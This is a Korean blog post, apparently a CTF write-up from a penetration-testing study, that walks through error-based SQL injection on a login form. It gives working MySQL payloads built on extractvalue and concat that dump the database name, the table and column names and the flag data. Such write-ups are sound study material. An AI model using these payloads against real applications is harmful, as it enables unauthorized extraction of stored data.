이번 문제는 Error Based SQLi에 관한 문제이다.

SQL Injection 3

우선 알고있는 "normaltic" 계정으로 로그인 해주면

normaltic 메인 화면

정상적으로 출력되는 것을 볼 수 있다.

 

1. SQL Injection Point

SQL Injection이 가능한지 알아보기 위해 "normaltic' and '1' = '1"을 실행해보면 정상적으로 로그인이 된다.

이를 통해 SQL Injection이 가능함을 알 수 있다.

 

그 다음 SQL Injection중 어떤 방안을 접근할 지 알아보기 위해 " normaltic' "를 실행해 보면

normaltic' 실행

SQL에러가 직접적으로 출력되는 것을 볼 수 있다. 이를 통해 Error Based SQL Injection을 활용하면된다는 것을 알 수 있다.

 

2. 에러를 출력 함수 선택

에러를 직접 추출하기 위해 'extractvalue' 함수를 사용해주겠다.


3. 공격 format 만들기

공격 format은 위의 정보를 바탕으로

normaltic' and extractvalue( '1', concat(0x3a, (__SQL__))) and '1' = '1

해당 구문으로 만들어 주었다.

 

4. DB명 출력

DB명 출력 구문은

normaltic' and extractvalue( '1', concat(0x3a, (select database()))) and '1' = '1

이렇게 작성하였고 출력해보면

DB명 출력

위 처럼 DB명이 출력되는것을 알 수 있다.

 

5. Table명 출력

Table명 출력 구문은

normaltic' and extractvalue( '1', concat(0x3a, (select group_concat(table_name) from information_schema.tables where table_schema='DB명'))) and '1' = '1

이렇게 작성하였고 이를 출력하면

table 출력

총 2개의 테이블이 출력되는 것을 볼 수 있다.

 

6. Column 명 출력

위에 테이블 중 'flag'와 관련된 데이블에 대한 Column명 출력 구문은

normaltic' and extractvalue( '1', concat(0x3a, (select group_concat(column_name) from information_schema.columns where table_name='테이블명'))) and '1' = '1

 

이렇게 작성하였고 이를 출력해보면

컬럼명 출력

플래그와 관련한 컬럼1개가 출력되는 것을 알 수 있다.

 

7. DATA 출력

마지막으로 DATA 를 출력하면 된다. DATA 출력 구문은

normaltic' and extractvalue( '1', concat(0x3a, (select group_concat(컬럼명) from 테이블명))) and '1' = '1

이렇게 작성하였고 이를 출력해보면

 

data 출력

플래그값을 찾을 수 있다.

728x90
반응형
저작자표시 비영리 동일조건

'모의해킹 > 모의해킹 스터디' 카테고리의 다른 글

모의해킹 스터디 CTF 문제 - SQL Injection 5  (0) 2024.12.10
모의해킹 스터디 CTF 문제 - SQL Injection 4  (0) 2024.12.06
모의해킹 스터디 CTF 문제 - SQL Injection (Blind Practice)  (0) 2024.12.04
모의해킹 스터디 CTF 문제 - Error Based SQLi Basic  (0) 2024.12.04
모의해킹 스터디 7주차 정리  (0) 2024.12.02

티스토리툴바